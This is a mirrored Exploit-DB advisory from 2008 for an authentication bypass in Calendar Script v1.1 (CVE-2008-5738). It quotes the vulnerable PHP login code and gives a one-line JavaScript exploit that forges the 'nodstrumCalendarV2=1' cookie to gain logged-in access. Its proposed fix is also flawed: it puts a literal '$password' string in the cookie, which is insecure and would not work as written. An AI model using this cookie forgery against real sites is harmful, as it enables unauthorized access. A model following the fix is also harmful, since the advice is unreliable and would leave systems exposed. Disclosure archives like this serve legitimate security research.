- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7513
- Проверка EDB
-
- Пройдено
- Автор
- OSIRYS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5738
- Дата публикации
- 2008-12-18
Код:
[START]
#########################################################################################
[0x01] Informations:
Script : Calendar Script v1.1
Download : http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1
Vulnerability : Insecure Cookie Handling
Author : Osirys
Contact : osirys[at]live[dot]it
Website : http://osirys.org
Notes : Proud to be Italian
Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
#########################################################################################
[0x02] Bug: [Insecure Cookie Handling]
######
Bugged file is: /[path]/index.php
[CODE]
if(mysql_num_rows($checkDetails) > 0) {
setcookie('nodstrumCalendarV2', '1', time()+3600); // Cookie will expire in 1 hour.
// $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
}
If we login in correctly, a cookie is created with 'nodstrumCalendarV2' as name and
'1' as content.
## [!] FIX: Change name or content to the cookie. Example:
Код:
if(mysql_num_rows($checkDetails) > 0) {
setcookie('nodstrumCalendarV2', '$password', time()+3600); // Cookie will expire in 1 hour.
// $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
}
### [!] EXPLOIT: javascript:document.cookie = "nodstrumCalendarV2=1; path=/";
#########################################################################################
[/END]
# milw0rm.com [2008-12-18][/CODE]
- Источник
- www.exploit-db.com